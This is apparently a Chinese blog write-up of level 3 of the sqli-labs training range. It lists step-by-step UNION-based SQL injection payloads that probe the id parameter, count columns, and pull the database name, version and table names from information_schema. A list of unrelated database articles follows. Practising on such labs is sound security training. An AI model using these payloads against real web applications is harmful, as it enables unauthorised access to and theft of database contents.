web——sqliabs靶场——第三关

今天来搞搞第三关,感觉和之前差不多,就多了一个奇怪的知识

来看看有没有注入点

/?id=1'

有注入点

判断注入点类型

输入/?id=1') and 1=2 --+

3.判断它的字段数

/?id=1') order by 1-++

/?id=1') order by 2-++

/?id=1') order by 3-++

/?id=1') order by 4-++

爆出显示位

/?id=-1') union select 1,2,3 --+

开始判断库名

?id=-1') union select 1,database(),version() --+

判断表名

/?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

判断user的列名

爆具体的列里的数据

相关推荐
大视码垛机3 分钟前
协作机器人掀起工厂革命:码垛场景如何用数据重塑制造业命脉?
大数据·数据库·人工智能
火凤凰--凤凰码路2 小时前
MySQL 中的“双路排序”与“单路排序”:原理、判别与实战调优
android·数据库·mysql
m0_564264184 小时前
开源数据库E-R图绘制工具分享
数据库·经验分享·mysql·e-r图·开源工具
····懂···4 小时前
关于PGCE专家技术认证解决方案
数据库·postgresql
秋千码途4 小时前
小架构step系列22:加载系统配置
数据库·架构
zone_z4 小时前
告别静态文档!Oracle交互式技术架构图让数据库学习“活“起来
数据库·学习·oracle
旧时光巷5 小时前
SQL基础⑭ | 变量、流程控制与游标篇
数据库·sql·学习·mysql·变量·游标·流程控制
PythonicCC5 小时前
Django模板系统
数据库·django
小云数据库服务专线5 小时前
GaussDB view视图的用法
数据库
DBLens数据库管理和开发工具5 小时前
MySQL新增字段DDL:锁表全解析、避坑指南与实战案例
数据库·后端